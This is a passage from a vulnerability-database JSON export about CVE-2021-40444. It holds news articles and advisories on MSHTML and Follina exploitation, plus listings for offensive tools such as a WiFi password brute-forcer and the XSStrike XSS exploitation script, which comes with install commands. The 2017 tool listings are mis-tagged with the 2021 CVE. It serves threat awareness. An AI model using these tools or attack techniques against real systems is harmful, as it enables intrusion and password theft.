ransomware-as-a-service (RaaS) ecosystem or that the more operationally sophisticated groups engaged in traditional, government-backed espionage are using criminally controlled infrastructure to misdirect and impede attribution.\"\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-16T07:19:00", "type": "thn", "title": "Windows MSHTML 0-Day Exploited to Deploy Cobalt Strike Beacon in Targeted Attacks", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-12T15:17:20", "id": "THN:59AE75C78D4644BFA6AD90225B3DE0C1", "href": "https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-30T17:38:47", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgi3RXvGtPoTC8ufDqadLbye4bhkJjWs-Un41xcwOWrqQPpLekG-pG0Xxk-or-GInK-LQOG7QDpCF3p4FVNPMxdNLSsl4TgenAVq4LOJcfYcZ0LcgQ0zlwru8TY2ff5ffd7EEPtwFERwA4hDGj0uKeJYZBw1AGUroAFwL-QXSJrDONv8gHe7E2ghPpr/s728-e100/hacking-code.jpg>)\n\nCybersecurity researchers are calling attention to a zero-day flaw in 
Microsoft Office that could be abused to achieve arbitrary code execution on affected Windows systems.\n\nThe vulnerability came to light after an independent cybersecurity research team known as nao_sec uncovered a Word document (\"[05-2022-0438.doc](<https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/detection>)\") that was uploaded to VirusTotal from an IP address in Belarus.\n\n\"It uses Word's external link to load the HTML and then uses the 'ms-msdt' scheme to execute PowerShell code,\" the researchers [noted](<https://twitter.com/nao_sec/status/1530196847679401984>) in a series of tweets last week.\n\nAccording to security researcher Kevin Beaumont, who dubbed the flaw \"Follina,\" the maldoc leverages Word's [remote template](<https://attack.mitre.org/techniques/T1221/>) feature to fetch an HTML file from a server, which then makes use of the \"ms-msdt://\" URI scheme to run the malicious payload.\n\nThe shortcoming has been so named because the malicious sample references 0438, which is the area code of Follina, a municipality in the Italian city of Treviso.\n\n[MSDT](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msdt>) is short for Microsoft Support Diagnostics Tool, a utility that's used to troubleshoot and collect diagnostic data for analysis by support professionals to resolve a problem.\n\n\"There's a lot going on here, but the first problem is Microsoft Word is executing the code via msdt (a support tool) even if macros are disabled,\" Beaumont [explained](<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e>).\n\n\"[Protected View](<https://support.microsoft.com/en-us/topic/what-is-protected-view-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653>) does kick in, although if you change the document to RTF form, it runs without even opening the document (via the preview tab in Explorer) let alone Protected View,\" the researcher 
added.\n\nIn a standalone analysis, cybersecurity company Huntress Labs detailed the attack flow, noting the HTML file (\"RDF842l.html\") that triggers the exploit originated from a now-unreachable domain named \"xmlformats[.]com.\"\n\n\"A Rich Text Format file (.RTF) could trigger the invocation of this exploit with just the Preview Pane within Windows Explorer,\" Huntress Labs' John Hammond [said](<https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug>). \"Much like CVE-2021-40444, this extends the severity of this threat by not just 'single-click' to exploit, but potentially with a 'zero-click' trigger.\"\n\nMultiple Microsoft Office versions, including Office, Office 2016, and Office 2021, are said to be affected, although other versions are expected to be vulnerable as well.\n\nWhat's more, Richard Warren of NCC Group [managed](<https://twitter.com/buffaloverflow/status/1530866518279565312>) to demonstrate an exploit on Office Professional Pro with April 2022 patches running on an up-to-date Windows 11 machine with the preview pane enabled.\n\n\"Microsoft are going to need to patch it across all the different product offerings, and security vendors will need robust detection and blocking,\" Beaumont said. We have reached out to Microsoft for comment, and we'll update the story once we hear back.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-30T09:40:00", "type": "thn", "title": "Watch Out! Researchers Spot New Microsoft Office Zero-Day Exploit in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-30T15:44:33", "id": "THN:E7762183A6F7B3DDB942D3F1F99748F6", "href": "https://thehackernews.com/2022/05/watch-out-researchers-spot-new.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:39", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEjqkUGrj098m-d_WWiB3rvM91Eu1x3fZweKFwfNSYwVrZToTWUlCh3s3UvHQIXtbPP4vPubJ_dEdC7jSX7gGkeScLCqYsa37Zuw_hFBK6g9FbzvO5nMZPrRUk6fjS1F01cduuDD_mnZ-OKnauen-xJmprSHgWH_jmx8MYUffZvp4uojtUBzm6BbCwIZ>)\n\nCybersecurity researchers on Tuesday took the wraps off a multi-stage espionage campaign targeting high-ranking 
government officials overseeing national security policy and individuals in the defense industry in Western Asia.\n\nThe attack is unique as it leverages Microsoft OneDrive as a command-and-control (C2) server and is split into as many as six stages to stay as hidden as possible, Trellix \u2014 a new company created following the merger of security firms McAfee Enterprise and FireEye \u2014 said in a [report](<https://www.trellix.com/en-gb/about/newsroom/stories/threat-labs/prime-ministers-office-compromised.html>) shared with The Hacker News.\n\n\"This type of communication allows the malware to go unnoticed in the victims' systems since it will only connect to legitimate Microsoft domains and won't show any suspicious network traffic,\" Trellix explained.\n\nFirst signs of activity associated with the covert operation are said to have commenced as early as June 18, 2021, with two victims reported on September 21 and 29, followed by 17 more in a short span of three days between October 6 and 8.\n\n\"The attack is particularly unique due to the prominence of its victims, the use of a recent [security flaw], and the use of an attack technique that the team had not seen before,\" Christiaan Beek, lead scientist at Trellix, said. 
\"The objective was clearly espionage.\"\n\nTrellix attributed the sophisticated attacks with moderate confidence to the Russia-based [APT28](<https://malpedia.caad.fkie.fraunhofer.de/actor/sofacy>) group, also tracked under the monikers Sofacy, Strontium, Fancy Bear, and Sednit, based on similarities in the source code as well as in the attack indicators and geopolitical objectives.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEiHATh-_6CXq1DE4gF63tRFptoK4b3k33uBkDfc-JwaJRbLhn0cxU2JHUh5A-0U_AsQ3XgqvcFjPKtR6AVo-_daYwK8-jLWPGzamt2d7MjD1zstHO8IFPqdv3NTZU3GvsI_Wdk9Q7rG6zd84PEcawqbp7bJMrog9xoaUDkiJadygQnO1Wh-qdlH79xN>)\n\n\"We are supremely confident that we are dealing with a very skilled actor based on how infrastructure, malware coding and operation were set up,\" Trellix security researcher Marc Elias said.\n\nThe infection chain begins with the execution of a Microsoft Excel file containing an exploit for the MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>)), which is used to run a malicious binary that acts as the downloader for a third-stage malware dubbed Graphite.\n\nThe DLL executable uses OneDrive as the C2 server via the Microsoft Graph API to retrieve additional stager malware that ultimately downloads and executes [Empire](<https://attack.mitre.org/software/S0363/>), an open-source PowerShell-based post-exploitation framework widely abused by threat actors for follow-on activities.\n\n\"Using the Microsoft OneDrive as a command-and-control Server mechanism was a surprise, a novel way of quickly interacting with the infected machines by dragging the encrypted commands into the victim's folders,\" Beek explained. 
\"Next OneDrive would sync with the victim\u2019s machines and encrypted commands being executed, whereafter the requested info was encrypted and sent back to the OneDrive of the attacker.\"\n\nIf anything, the development marks the continued exploitation of the MSHTML rendering engine flaw, with [Microsoft](<https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html>) and [SafeBreach Labs](<https://thehackernews.com/2021/11/hackers-using-microsoft-mshtml-flaw-to.html>) disclosing multiple campaigns that have weaponized the vulnerability to plant malware and distribute custom Cobalt Strike Beacon loaders.\n\n\"The main takeaway is to highlight the level of access threat campaigns, and in particular how capable threat actors are able to permeate the most senior levels of government,\" Raj Samani, chief scientist and fellow at Trellix told The Hacker News. \"It is of paramount importance that security practitioners tasked with protecting such high value systems consider additional security measures to prevent, detect and remediate against such hostile actions.\"\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-01-25T14:04:00", "type": "thn", "title": "Hackers Exploited MSHTML Flaw to Spy on Government and Defense Targets", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-29T08:06:51", "id": "THN:BD014635C5F702379060A20290985162", "href": "https://thehackernews.com/2022/01/hackers-exploited-mshtml-flaw-to-spy-on.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:18", "description": "[](<https://thehackernews.com/images/-n2LTDkSYrUk/YUF8P0ggXPI/AAAAAAAADzE/Jk_5Hbl3Sf4AUwjPizqDaRZLrxWgrDizgCLcBGAsYHQ/s0/windows-update-download.jpg>)\n\nA day after [Apple](<https://thehackernews.com/2021/09/apple-issues-urgent-updates-to-fix-new.html>) and [Google](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) rolled out urgent 
security updates, Microsoft has [pushed software fixes](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Sep>) as part of its monthly Patch Tuesday release cycle to plug 66 security holes affecting Windows and other components such as Azure, Office, BitLocker, and Visual Studio, including an [actively exploited zero-day](<https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html>) in its MSHTML Platform that came to light last week. \n\nOf the 66 flaws, three are rated Critical, 62 are rated Important, and one is rated Moderate in severity. This is aside from the [20 vulnerabilities](<https://docs.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) in the Chromium-based Microsoft Edge browser that the company addressed since the start of the month.\n\nThe most important of the updates concerns a patch for [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>) (CVSS score: 8.8), an actively exploited remote code execution vulnerability in MSHTML that leverages malware-laced Microsoft Office documents, with EXPMON researchers noting \"the exploit uses logical flaws so the exploitation is perfectly reliable.\"\n\nAlso addressed is a publicly disclosed, but not actively exploited, zero-day flaw in Windows DNS. 
Designated as [CVE-2021-36968](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36968>), the elevation of privilege vulnerability is rated 7.8 in severity.\n\nOther flaws of note resolved by Microsoft involve a number of remote code execution bugs in Open Management Infrastructure ([CVE-2021-38647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38647>)), Windows WLAN AutoConfig Service ([CVE-2021-36965](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36965>)), Office ([CVE-2021-38659](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38659>)), Visual Studio ([CVE-2021-36952](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36952>)), and Word ([CVE-2021-38656](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38656>)), as well as a memory corruption flaw in Windows Scripting Engine ([CVE-2021-26435](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26435>)).\n\nWhat's more, the Windows maker has rectified three privilege escalation flaws newly uncovered in its Print Spooler service ([CVE-2021-38667](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38667>), [CVE-2021-38671](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38671>), and [CVE-2021-40447](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40447>)), while [CVE-2021-36975](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36975>) and [CVE-2021-38639](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38639>) (CVSS scores: 7.8), both of which relate to elevation of privilege vulnerabilities in Win32k, are listed as 'exploitation more likely,' making it imperative that users move quickly to apply the security updates.\n\n### Software Patches From Other Vendors\n\nBesides Microsoft, patches have also been released by a number of other vendors to address several 
vulnerabilities, including -\n\n * [Adobe](<https://helpx.adobe.com/security.html/security/security-bulletin.ug.html>)\n * [Android](<https://source.android.com/security/bulletin/2021-09-01>)\n * [Apple](<https://thehackernews.com/2021/09/apple-issues-urgent-updates-to-fix-new.html>)\n * [Cisco](<https://tools.cisco.com/security/center/publicationListing.x>)\n * [Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>)\n * Linux distributions [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21>), [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=2&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=Errata>), and [SUSE](<https://lists.suse.com/pipermail/sle-security-updates/2021-September/thread.html>)\n * [SAP](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=585106405>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/overview.jsp>), and\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T05:00:00", "type": "thn", "title": "Microsoft Releases Patch for Actively Exploited Windows Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26435", "CVE-2021-36952", "CVE-2021-36965", "CVE-2021-36968", "CVE-2021-36975", "CVE-2021-38639", "CVE-2021-38647", "CVE-2021-38656", "CVE-2021-38659", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40444", "CVE-2021-40447"], "modified": "2021-09-15T05:00:22", "id": "THN:67ECC712AB360F5A56F2434CDBF6B51F", "href": "https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:37:55", "description": "A remote code execution vulnerability exists in Microsoft Internet Explorer MSHTML. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer MSHTML Remote Code Execution (CVE-2021-40444)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-14T00:00:00", "id": "CPAI-2021-0554", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Microsoft MSHTML Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", 
"title": "Microsoft Windows, Server (spec. IE) All Arbitrary Code Execution", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-40444", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "kitploit": [{"lastseen": "2021-09-21T01:08:55", "description": "[  ](<https://4.bp.blogspot.com/-xvB75HZoGyw/WXipGd6I8sI/AAAAAAAAIY8/cfrIns4l0U46vmwpW4jIfyyZqB3F6990gCLcBGAs/s1600/wifi-bruteforcer.jpg>)\n\n \n** WARNING: ** This project is still under development, and installing the app may misconfigure the Wi-Fi settings of your Android OS; a system restore may be necessary to fix it. \n \nAndroid application to brute force WiFi passwords without requiring a rooted device. \n \n\n\n** [ Download WiFi Bruteforcer ](<https://github.com/faizann24/wifi-bruteforcer-fsecurify>) **\n", "cvss3": {}, "published": "2017-08-04T22:12:00", "type": "kitploit", "title": "WiFi Bruteforcer - Android application to brute force WiFi passwords (No Root Required)", "bulletinFamily": "tools", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2017-08-04T22:12:00", "id": "KITPLOIT:1624142243530526923", "href": "http://www.kitploit.com/2017/08/wifi-bruteforcer-android-application-to.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-21T03:08:41", "description": "Faraday is the ** Integrated Multiuser Risk Environment ** you were looking for! 
It maps and leverages all the knowledge you generate ** in real time ** , letting you track and understand your audits. Our dashboard for CISOs and managers uncovers the ** impact and risk ** being assessed by the audit in real-time without the need for a single email. Developed with a specialized set of functionalities that helps users improve their own work, the main purpose is to ** re-use the available tools in the community ** taking advantage of them in a collaborative way! \n\n \n\n\n#### Managing your assessments \n\nIn the last couple of versions we added several features to allow our users to manage more and more parts of their engagements directly from our platform so we realized, why not also add the option to manage methodologies and tasks? And so we did! \n\n \n\n\n \n \n \nKanban Tasks View \n\n\n \n\n\nNow you can create your custom methodologies, add tasks, tag them and keep track of your whole project directly from Faraday. \n\n#### Improving the Data Analysis tools \n\nAs per your requests, we made some ** changes to the existing Data Analysis tools ** introduced [ in the last release ](<https://t.umblr.com/redirect?z=http%3A%2F%2Fblog.infobytesec.com%2F2017%2F05%2Fa-brand-new-faraday-version-is-ready.html&t=MmY2ZGZiYzNiN2U3ZTc1ZjJlNTM2ODdhZGEzZDA4YmM2YmUwYTA3MyxhS0puRFRzNg%3D%3D&b=t%3A9lMgVrldXxD4iFATXLExSw&p=https%3A%2F%2Fwww.tumblr.com%2Fblog%2Fblackploit%2Fsubmissions%3F163713401737&m=1>) . We added the possibility to change data configuration in order to customize charts, a new bar chart type to show most vulnerable services and a filter for ** undefined ** or ** null ** values. \n\n \n\n\n \n \n \nMost vulnerable services \n \n \n \n \nModal to set chart properties \n \n \n \n \nCharts customization \n\n\n#### Executive Report clean up \n\nSome users reported issues with the sorting of Hosts and Evidence in the reports. We fixed it so the hosts in grouped reports are sorted by IP and evidence is sorted alphabetically by name. 
\n\n \n \n \n \nTargets are sorted by IP \n \n \n \n \nEvidence names sorted alphabetically \n \nWe know sometimes it is necessary to use special characters for evidence names. Some of our users \n\n\n#### Web UI \n\nNow you can manually create the same vulnerability in several hosts at once! Select as many targets as you want when creating your vulns. \n \n \n \n \nAdd vuln to multiple targets at once \n \nAlso, we made the vulnerability creation modal more consistent with the rest of the views by starting the pagination of the targets in page 1 instead of 0. \n\n\n### Changes: \n\n * Improved Data analysis charts. Added more chart properties and data binding \n * Improved target ordering in grouped reports \n * Fixed bug with new line character in reports DOCX \n * Adds alphabetical sort for Evidence in the Executive Report \n * Fix bug updating users with no roles \n * Fixed report creation with evidence names containing special chars \n * Added Tasks Management to the Web UI \n * Added the ability to select more than one target when creating a vuln in the Web UI \n * [ Merged PR #182 ](<https://t.umblr.com/redirect?z=https%3A%2F%2Fgithub.com%2Finfobyte%2Ffaraday%2Fpull%2F182&t=OWFjOWZkNmIwYmViZjZhOGI4MmIzZGI0ZmY0OTE4YjY0MDI3NzdjMyxhS0puRFRzNg%3D%3D&b=t%3A9lMgVrldXxD4iFATXLExSw&p=https%3A%2F%2Fwww.tumblr.com%2Fblog%2Fblackploit%2Fsubmissions%3F163713401737&m=1>) \\- problems with zonatransfer.me \n * Fixed bug in Download CSV of Status report with old versions of Firefox \n * Fixed formula injection vulnerability in export to CSV feature \n * Fixed DOM-based XSS in the Top Services widget of the dashboard \n * Fix in AppScan plugin \n \n\n * Fix HTML injection in Vulnerability template \n * Add new plugin: Junit XML \n \n\n * Improved pagination in new vuln modal of status report \n * Added \u201cPolicy Violations\u201d field for Vulnerabilities \n\n \n\n\n** [ https://www.faradaysec.com/ ](<https://goo.gl/VvzfSv>) \n[ https://github.com/infobyte/faraday 
](<https://github.com/infobyte/faraday>) \n[ https://twitter.com/faradaysec ](<https://twitter.com/faradaysec>) \n[ https://forum.faradaysec.com/ ](<https://forum.faradaysec.com/>) \n[ https://www.faradaysec.com/ideas ](<https://www.faradaysec.com/ideas>) **\n", "cvss3": {}, "published": "2017-08-02T22:47:04", "type": "kitploit", "title": "Faraday v2.6 - Collaborative Penetration Test and Vulnerability Management Platform", "bulletinFamily": "tools", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2017-08-02T22:47:04", "id": "KITPLOIT:942518396640901655", "href": "http://www.kitploit.com/2017/08/faraday-v26-collaborative-penetration.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-20T08:38:14", "description": "[  ](<https://1.bp.blogspot.com/-v_w7OvujSF4/WYDvU1PzCPI/AAAAAAAAIbE/LmWC0wm0z-ED0TzSsRDTPX6pgHwMKSCzACLcBGAs/s1600/XSStrike_01.png>)\n\n \nXSStrike is a Python script designed to detect and exploit XSS vulnerabilities. \nA list of features XSStrike has to offer: \n\n\n * Fuzzes a parameter and builds a suitable payload \n * Bruteforces parameters with payloads \n * Has an inbuilt crawler like functionality \n * Can reverse engineer the rules of a WAF/Filter \n * Detects and tries to bypass WAFs \n * Both GET and POST support \n * Most of the payloads are hand crafted \n * Negligible number of false positives \n * Opens the POC in a browser window \n \n** Installing XSStrike ** \n \nUse the following command to download it \n\n \n \n git clone https://github.com/UltimateHackers/XSStrike/\n\nAfter downloading, navigate to XSStrike directory with the following command \n\n \n \n cd XSStrike\n\nNow install the required modules with the following command \n\n \n \n pip install -r requirements.txt\n\nNow you are good to go! 
Run XSStrike with the following command \n\n \n \n python xsstrike\n\n \n** Using XSStrike ** \n \n\n\n[  ](<https://3.bp.blogspot.com/-C0-vzsr3V44/WYDvUxulvNI/AAAAAAAAIbI/KqgbxKt4BJoBU3I-Q61a8C5hNSWmrFAsgCEwYBhgL/s1600/XSStrike_02.png>)\n\n \nYou can enter your target URL now but remember, you have to mark the most crucial parameter by inserting \"d3v<\" in it. \nFor example: target.com/search.php?q=d3v&category=1 \nAfter you enter your target URL, XSStrike will check if the target is protected by a WAF or not. If it's not protected by a WAF, you will get three options \n \n** 1\\. Fuzzer: ** It checks how the input gets reflected in the webpage and then tries to build a payload according to that. \n \n\n\n[  ](<https://4.bp.blogspot.com/-b-2wa0szDlk/WYDvVGvBrmI/AAAAAAAAIbM/8gb1cTXgY74mN1xBfgrLae8uXUb1kyDXQCEwYBhgL/s1600/XSStrike_03.png>)\n\n \n** 2\\. Striker: ** It bruteforces all the parameters one by one and generates the proof of concept in a browser window. \n \n\n\n[  ](<https://4.bp.blogspot.com/-T55ehl8fICw/WYDvVuhjMiI/AAAAAAAAIbQ/joigYEvavUYkyE7SEBuZrVy3CPCdAoE7QCEwYBhgL/s1600/XSStrike_04.png>)\n\n \n** 3\\. Spider: ** It extracts all the links present in the homepage of the target and checks parameters in them for XSS. \n \n\n\n[  ](<https://1.bp.blogspot.com/-ivkeIihQquQ/WYDvVzl8vkI/AAAAAAAAIbU/Hf96o86NMJUeEjtAObB-_U8RmBqFJQ71QCEwYBhgL/s1600/XSStrike_05.png>)\n\n \n** 4\\. Hulk: ** Hulk uses a different approach: it doesn't care about reflection of input. It has a list of polyglots and solid payloads; it just enters them one by one in the target parameter and opens the resulting URL in a browser window. 
